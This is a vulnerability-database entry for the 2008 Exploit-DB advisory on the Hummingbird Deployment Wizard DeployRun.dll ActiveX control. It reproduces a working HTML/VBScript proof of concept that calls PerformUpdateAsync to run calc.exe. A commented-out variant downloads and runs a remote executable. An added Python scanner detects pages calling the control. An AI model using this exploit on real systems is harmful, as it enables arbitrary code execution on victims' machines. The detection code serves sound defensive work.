vendor: Deployment Wizard 2008
by: shinnai
CVSS: 7.5 (HIGH)
Arbitrary File Execution
CWE: 94
Product Name: Deployment Wizard 2008
Affected Version From: DeployRun.dll <= 10.0.0.44
Affected Version To: DeployRun.dll <= 10.0.0.44
Patch Exists: NO
Related CWE: N/A
CPE: 7F9B30F1-5129-4F5C-A76C-CE264A6C7D10
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP3
2008

Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution(2)

Hummingbird Deployment Wizard 2008 (DeployRun.dll) is vulnerable to arbitrary file execution. The vulnerable method is PerformUpdateAsync (ByVal ExecAfterComplete As String). It has been tested on Windows XP Professional SP3, fully patched, with Internet Explorer 7.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

--------------------------------------------------------------------------------
 Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution(2)
 url: http://www.hummingbird.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.net

 This was written for educational purposes. Use it at your own risk.
 Author will not be responsible for any damage.
 
 Info:
 DeployRun.dll <= 10.0.0.44
 
 Marked as:
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe:  Safe for untrusted: caller,data  
 IPersist Safe:  Safe for untrusted: caller,data

 Vulnerable method:
 Sub PerformUpdateAsync (ByVal ExecAfterComplete As String)

 Tested on Windows XP Professional SP3 fully patched, with Internet Explorer 7

 There are a lot of dangerous methods, just take a look and... good searching
--------------------------------------------------------------------------------
<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test' height='20' width='20'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
 Sub tryMe
   test.PerformUpdateAsync "calc.exe"
   'test.PerformUpdateAsync "http://www.SomeSite.com/SomeFile.exe"
 End Sub
</script>

# milw0rm.com [2008-10-17]
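
A detection-side check for the pattern shown above, as an added example that is not part of the original advisory or of the author's code: it scans HTML (for instance in a web proxy or mail filter) for pages that instantiate the DeployRun control by the CLSID given above and call PerformUpdateAsync on it. The class and function names are assumptions made for this illustration, and the sample page is constructed.

```python
import re
from html.parser import HTMLParser

# CLSID and method name come from the advisory; all other names are illustrative.
CLSID_RE = re.compile(r"clsid:\s*\{?7F9B30F1-5129-4F5C-A76C-CE264A6C7D10\}?", re.I)
CALL_RE = re.compile(
    r"(\w+)\s*\.\s*PerformUpdateAsync\b(?:\s*\(?\s*([\"'])(.*?)\2)?", re.I)

class DeployRunScanner(HTMLParser):
    """Records <object> tags that load the control and collects script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object" and CLSID_RE.fullmatch(a.get("classid", "").strip()):
            self.object_ids.append(a.get("id", "").lower())
        if tag == "script":
            self._in_script = True
        # Inline event handlers (onclick=...) can carry the call as well.
        self.scripts += [v for k, v in a.items() if k.startswith("on")]

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan(html):
    """Report whether the page loads the control and calls PerformUpdateAsync."""
    p = DeployRunScanner()
    p.feed(html)
    p.close()
    calls = [{"object": obj,
              "arg": arg or None,  # None: argument is not a string literal
              "remote": bool(re.match(r"(?i)(https?:|ftp:|\\\\)", arg)),
              "on_control": obj.lower() in p.object_ids}
             for text in p.scripts for obj, _q, arg in CALL_RE.findall(text)]
    return {"control_loaded": bool(p.object_ids), "calls": calls,
            "alert": any(c["on_control"] for c in calls)}

# Constructed sample page, modelled on the markup shown in the advisory.
SAMPLE = """<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object>
<script language='vbscript'>
   test.PerformUpdateAsync "calc.exe"
</script>"""
if __name__ == "__main__":
    print(scan(SAMPLE))
```

The scanner reports commented-out calls too, since it matches on script text rather than parsing VBScript or JavaScript; treat a hit as a reason to inspect the page, not as proof of execution.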